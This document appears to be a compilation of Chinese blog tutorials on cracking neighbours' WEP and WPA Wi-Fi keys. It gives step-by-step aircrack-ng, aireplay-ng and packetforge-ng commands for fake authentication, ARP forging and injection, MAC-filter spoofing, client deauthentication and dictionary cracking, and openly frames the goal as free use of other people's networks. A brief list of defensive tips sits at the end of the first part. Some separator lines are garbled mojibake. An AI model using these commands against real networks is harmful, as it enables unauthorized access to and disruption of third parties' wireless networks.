4) aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1
-1 is -one
5) aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l
255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp
7) aireplay-ng -2 -r mrarp -x 1024 ath1
8) aircrack-ng -n 64 -b ap_mac name-01.ivs
我提供了样板的文件供下载。
以下一一解释:(运行这些命令都需要打开终端窗口,可以使用Ctrl+C
从文本文件Copy, 然后 Shift+Insert 粘贴入终端窗口)
1)ifconfig -a
这个命令用于找到自己的无线网卡的 Mac地址。请记录下来备用。
2) airmon-ng start wifi0 6
这个命令用于将自己的无线网卡置于Monitor
模式,即类似一个AP的效果,因此可以有抓别人包的功能。
其中 wifi0 是我电脑里面给无线网卡的 ,一般应该都是这个,第一个ifconfig
-a命令可以看得到。
wifi0 后面的那个6
,是需要破解的AP的频道,如果不知道,可以在事前左下角开始菜单里面,找到
第二项 Internet 下面的倒数第二个画着
无线网的一个工具,用它可以看到那些需要破解的AP的频道(Channel)。
运行命令成功以后,你会看到返回的提示显示出现一个 Ath1(如果你是
Athoes的无线网卡的话就是这个,其他的可能不同,不过一般都是XXX1这样)
这个就是你的用于破解的网卡代号
这个命令,简而言之,就是把你的无线网卡置于监控模式,并且指定监控的频道。
如果你发现弄错了频道,那么没关系,重新运行一遍就可以了,不过这个时候,可能就会变成
Ath2...Ath3 等等,但是好像最多运行三次,然后就会失败。
3) airodump-ng --ivs -w name -c 6 ath1
这个命令比较关键,你运行以后,就会列出所有该频道的AP。
其中,6 是指你需要监控的频道,必须和第二个命令里的一样,
ath1是刚才第二步出现的别名。
这个命令运行以后,显示的内容比较多,简单介绍一下:
BSSID : 其实就是AP的Mac 地址
PWR: AP信号的大小,一般,低于10,就比较麻烦了,丢包情况严重,比较难破解
RXQ: 干扰的大小
Beacons:发送接受的包,参考信息,在跳说明有数据
#Data:
这个比较重要,是接受到可以用来破解的特殊包,如果一直不变,那么,说明没有客户端连接,破解可能很麻烦,如果对方有大文件在下载,那么这个跳的速度非常快,10来分钟就可以有足够的包来破解了,如果跳得很慢,那么,就需要用一些特殊的方式来破解了。
CH:频道
MB:网络连接速度 54就是54MB
ENC, CIPHER,AUTH
这些是加密方式,我们这次只讨论显示为 WEP 和 WEP+ OPN的
如果显示 WPA TKIP 啥的,只能密码穷举破解,个人认为希望不大。
ESSID:
这个是AP的名字,需要用到的。如果是中文貌似会出问题。因此为了阻挡别人破解,可以用中文的ESSID
过一会儿,下面会显示哪些客户端连接到了哪些AP,针对有些Mac地址加密的,很容易模拟对方客户端的Mac从而骗进去,所以不要简单地相信Mac限制功能。
这个窗口就开着好了,不用关闭,以后的命令,需要重新打开一个终端窗口操作。
4)aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1
这一步开始,我们要做一些真正的破解工作,主要是针对那些客户端仅仅连接,没什么流量的AP,这种AP,#Data的增长非常慢,往往需要很长的时间才有可能取得足够的包(一般5位的密码需要10000个包左右,更多的密码就要更多的。。。。)这个时候就需要
aireplay-ng 出面了,顾名思义,这个软件就是 Replay,也就是说,模拟发包。
首先解释命令:
-e ap_essid 就是 -e 之后加上你需要破解的essid ,比如 TP-LINK ,
linksys 啥的,注意大小写。
-a ap_mac 就是 -a
之后加上你需要破解的AP的Mac地址,第三步BSSID就可以看得到。不需要 :哦。
-h XXXXXXXXXX 就是 -h 之后,加上你的无线网卡的 Mac地址,
在第一步你可以得到。
ath1 ,上面解释过了。
一个样板例子:
aireplay-ng -1 0 -e TP-LINK -a 001900123456 -h 001900345678 ath1
这里有个小的建议,大家可以把以上的命令,都记录在一个文件里,然后把里面的XXXXXXXX都用自己的网卡Mac地址替换掉,这样就不需要每次都输入自己的Mac地址了。每次都可以用Copy
Paste的方式来输入,这样可以有效防止什么1 和 l , O和0 的混淆。
这一条命令,是用欺骗的方式,连接上那个AP,因此,如果网络信号不好,可能会执行不成功。
如果成功了,那么会显示Successful :> 字样。否则,请让信号强度大于10。
5)aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
上一条成功以后,我们需要开始收集那些需要的数据包,才能够进行模拟,并且破解。
所谓的需要的数据包,就是 #Data的数据,如果
#Data一直是0,那么可能会很麻烦,最好的情况是 #Data缓慢增长的这种情况。
解释一下
-b ap_mac 就是你需要破解的AP的Mac 地址,从第三步那里的 BSSID可以找得到。
-h XXXXXXXXXX 就是你自己网卡的Mac地址。
Ath1 和上面一样。。。。。
这一条命令的执行,和#data包有关,如果#Data
没有增加,则这个命令会一直执行,直到捕获一个#Data包。
捕获以后,程序会问你是否需要用这个包来模拟攻击。回答Y即可。
如果攻击成功,则会显示成功,失败往往是因为信号太差造成的,
如果攻击失败(往往是捕获的包有问题),程序重试N次以后,或自动重新开始捕捉包,继续进行即可。
等成功完成以后,会显示一个文件名:fragment-XXXXX-XXXXXX.xor
这个文件名,XXXXX里面是数字,是一个文件。马上会用得到。
这一步是最有可能失败的一步,尽量保持信号好一点。
6) packetforge-ng -0 -a ap_mac -h XXXXXXXXXX -k 255.255.255.255 -l
255.255.255.255 -y fragment-XXXXX-XXXXXX.xor -w mrarp
第六步,参数比较多,解释一下:
-a ap_mac 是待破解的AP的Mac地址,
-h XXXXXXXXX 是你自己的无线网卡Mac地址
fragment-XXXXX-XXXXXX.xor 就是第五步显示的那个文件名。
这一步会很快做完, 显示生成文件到 mrarp啥的,其实就是破解包的准备过程。
7) aireplay-ng -2 -r mrarp -x 1024 ath1
这一步没哈可以修改的,参数解释一下
ath1 是 你的无线网卡的名字
1024
是攻击速度,1024是最大值了,如果你的无线网卡不是MiniPCI的,个人建议设为
512 ,这样不容易死机。
当这一步开始执行,你会看到 第一个终端窗口里面,你破解的那个AP后面的
#Data在飞速增长,一般是 200个/s的速度,我们只需等待即可
8)我们可以新打开一个终端窗口,当 #Data达到
10000个的时候,就可以测试破解了,很多密码都可以 10000左右#Data就算出来
新窗口中运行:
aircrack-ng -n 64 -b ap_mac name-01.ivs
解释一下,
-b ap_mac 对方AP的Mac地址
name-01.ivs 其实是第三步自动生成的一个文件,
如果你多次运行了第三步,那么,可能会生成多个 name-XX.ivs文件,
你可以到对应的文件夹里看一下(就在桌面上的第一个文件夹图标里),找到XX最大的那个,就是你当前正在使用的这个文件。
运行以后,如果运气好,一会儿就会显示破解出来的密码,同时会显示
对应的Assic码,如果不是标准Assic码,就是一串数字,记录下来,搞掂。
运气不好的情况,这个程序会继续等待更多的#Data,等到了,就会重新计算一次密码。
不过呢,我也试过,30万个#Data都没能算出来,这个加密的兄弟真厉害。
小结一下:
本教程只针对 WEP
密码的破解,而且,最好有得到认证的客户端连接在这个AP上,如果没有,有些AP(比如TP-LINK)能够被破解,某些可能就无法破解。
本教程也提供了 模拟Mac地址从而破解 Mac限制的方法
如果你需要你的AP很难被破解,建议:
1)用WPA 加密方式,并且使用不可能被字典猜到的密码,目前还是基本可靠的
2)如果只支持 WEP加密,那么,尽量考虑用隐藏
SSID的方式,这样可以增加破解难度
3)如果只支持
WEP加密,那么,可以考虑使用中文名字作为SSID,这样基本问题不大。
4)一般破解时候,大家都会选择常用的频道,例如 6频道,
第三步显示频道的时候,你的AP也会被列出来,那么第一个目标失败的时候,黑客往往会选择第二个容易下手的目标,
但是如果你选择了8、
4、这些奇怪的频道,那么狠客往往懒得重新进入该频道的监控模式,你就可以逃过一劫。不过,
某些廉价AP,往往对6 频道做了优化,这个频道信号最强....这就没办法了。
5)有空换换你的密码:)
又注:联入网络以后,你可以管理他的AP,进行一些优化啥的,往往AP的密码,可能就是WEP的密码。
前些天试了下Ubuntu的最新版Hardy
Heron(坚毅的苍鹭),并试验了WEP破解,写点心得吧。
首先声明,各种教程和经验网上太多太多了,我也是参考网上的做法才成功的,所以这里我就不详细写过程,只提遇到的难点和解决办法。
破解WEP的方式大概有这几种:
1、Linux + 无线网卡 + 可以工作在Monitor模式的驱动程序 +
破解软件(aircrack等);【首选】
2、Windows + 更新版的驱动(可以处于监听模式) + 抓包软件(Omnipeek) +
WEP破解软件(winaircrack、aircrack-ng for win等);
3、Windows + CommView驱动 + 驱动支持的无线网卡 +
破解软件,有个软件叫AiroWizard,它为aircrack-ng加了个好用的界面,并整合了CommView驱动,网上很难下载到,因为被告了,这个project已经停了,但是只要你去找总是能下载的到的,我有AiroWizard
1.0 Beta revision 250,想要的话留个email就好了;
4、Windows + USB无线网卡 + Vmware + Backtrack 3 ISO;
5、直接刻一张有WEP破解软件的Live CD + CD支持的无线网卡。
说明:第一种方法是最好最灵活的,在Windows下弄也能破解,如果你和我一样用的是intel
3945ABG的网卡,我劝你还是用Linux吧:Intel的新版驱动虽然支持被动侦听,却不支持主动攻击,如果你能找到一个流量很大的AP,那你可以试试,否则抓一整天包,IV数都不够你破解64位WEP的。
AiroWizard貌似是windows下一个较好的方法,但是你看看CommView的驱动网卡支持列表就会失望的:http://www.tamos.com/products/commwifi/adapterlist.php
但是AiroWizard这个软件界面真的不错,如果你有足够的WEP包,烦透了敲aireplay、airodump、aircrack这几个命令,仅仅是需要一个好的GUI的话,这是一个很好的选择。
第四种方法需要一个USB的无线网卡,而且用Vmware进系统之后还是要敲Linux命令的。
第五种方法是最快捷的方式,但是你一定要确认该CD有你的网卡驱动,否则你会刻出一张以后永远不会用到的光盘。
我曾尝试过2、3、5,都失败了,2本来可以成功的,但是我抓包抓的实在是没耐心了,下面简要介绍1
鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧
偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧
偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓
Ubuntu 8.04 LTS硬盘安装:
建议采用硬盘安装而不是刻光盘,因为Linux版本更新实在太快了,刻张盘几个月后就没用了。
我用的是WinGrub+Ubuntu8.04 Alternative
CD,装8.04你可能会遇到LiveCD启动不了的问题,那就试试在Grub中加"all_generic_ide
floppy=off
irqpoll"这几个参数,也许就好了,如果是光盘启动,就先按F6,再输参数。
我刚开始用的是Ubuntu8.04 Live
CD,死活都驱动不了,什么内核参数都试过了,都没用,后来换成 Alternative
CD就可以装了,鬼知道什么原因……
WinGrub很容易用,注意设置成安装在"boot.ini"内,安装Alternative
CD时要从网上down
vmlinuz和initrd这两个文件,网上的教程一堆一堆的,随便搜一个就是了。
鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧
偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧
偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓
WEP破解,我只有一台本本,所以只知道intel 3945abg的网卡可以这么做:
1、说了这么多,最最重要的就是驱动,没驱动什么都干不了,aircrack-ng也有个驱动的支持列表,可喜的是intel系列的网卡在支持之列;但是Hardy自带的驱动叫iwl3945,aircrack是不支持的!尝试运行airodump命令就会发现有错误,需要安装ipwraw的驱动,网上一搜就有了,我装的是08年的某个版本,反正可以正常使用就对了;
2、make &make install
&makeinstall_ucode(firmware,固件),参看readme就行了(注意安装之前最好先把build
essential装了,免得出什么错误);
3、安装aircrack-ng,在Ubuntu里直接用apt-get就可以搜的到,真是方便啊
4、正式破解开始,最基本的需要以下几个命令:
modprobe -r ipw3945 卸掉ipw3945驱动
到ipwraw的intel那个文件夹里头,运行./load 加载ipwraw驱动
airodump-ng wifi0 查看所有无线网络的信息,包括ESSID、BSSID,先记下来
airodump-ng -w out -b x:x:x:x:x:x wifi0 开始抓包
然后新开个terminal运行aireplay-ng,这个是aircrack的精华所在,好好研究下再用
aircrack-ng
out-01.cap,aircrack很智能的,可以跟airodump-ng同时运行,按提示选择你要破解的AP就行了。
鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧
偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧
偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓鈧 偓
WEP破解太轻松了,第一次你可能要花好几个小时来弄(我可是花了好几天时间……),但是熟练的时候破解一个64位的WEP,5分钟就够了,128-bit也就10分钟左右搞定。
那么WPA能不能破解呢??我也找了不少这方面的资料,但是找到的方法只有BruteForce
attack(暴力破解),就是一个一个密码的尝试,弱口令会很容易找出来,取决于你有一个好的密码字典文件,aircrack-ng的计算速度大概几百k/s吧,但是它需要一次完整的握手过程,所以你需要配合aireplay来用,反正我尝试过几次,都没破解出来,总之WPA比WEP要安全多了就是。
Over,偷着上上网就罢了,别干坏事!
BTW:aircrack-ng的网站貌似被GFWed了,找国外代理就能上了。
破解WPA加密的方法 基础 之二
2008-10-01 23:08
WPA是一种基于标准的可互操作的WLAN安全性增强解决方案,可大大增强现有以及未来无线局域网系统的数据保护和访问控制水平。WPA源于正在制定中的IEEE802.11i标准并将与之保持前向兼容。部署适当的话,WPA可保证WLAN用户的数据受到保护,并且只有授权的网络用户才可以访问WLAN网络。
大家如果看了我的基础一的话,我在这里就不罗嗦,直接写命令了,没看了可以看看,在看这文章
文章地址:http://www.china-wifi.com/forum/read.php?tid=612
命令:
我要收集信道为6的AP的数据包,然后把数据保存为meimei,而我网卡的接口是 ath0
Quote:
./airodump ath0 meimei 6
然后呢用字典暴力破解
字典下载: http://www.openwall.com/wordlists
有一个免费的,有一个收费的字典,40万的密码
Quote:
./aircrack -a 2 -b 00:23:1F:55:04:BC -w /path/to/wordlist
当然 用字典的成功的机会可大可小
那么我们用aireplay来 arp注入破解
Quote:
./aireplay -3 -b <AP MAC Address> -h <Client MAC Address> ath0
交互封包攻击
Quote:
aireplay -2 -b <AP MAC> -h <Client MAC> -n 100 -p 0841 -c
FF:FF:FF:FF:FF:FF ath0
你也可以假冒认证来破解
Quote:
./aireplay -1 30 -e '<ESSID>' -a <BSSID> -h <Fake MAC> ath0
如果成功会出现
Quote:
23:47:29 Sending Authentication Request
23:47:29 Authentication successful
23:47:30 Sending Association Request
23:47:30 Association successful :-)
如果失败 也许是对方起用了MAC过滤
这个时候你需要找到一个可以通过认证的MAC地址来欺骗
Deauthentication攻击
强制一个已经连接的客户端断线,然后冒充对方连上ap
Quote:
aireplay -0 5 -a <AP MAC> -c <Client MAC> ath0
然后 在用字典破解
呵呵 个人理解 它比wep多了个加密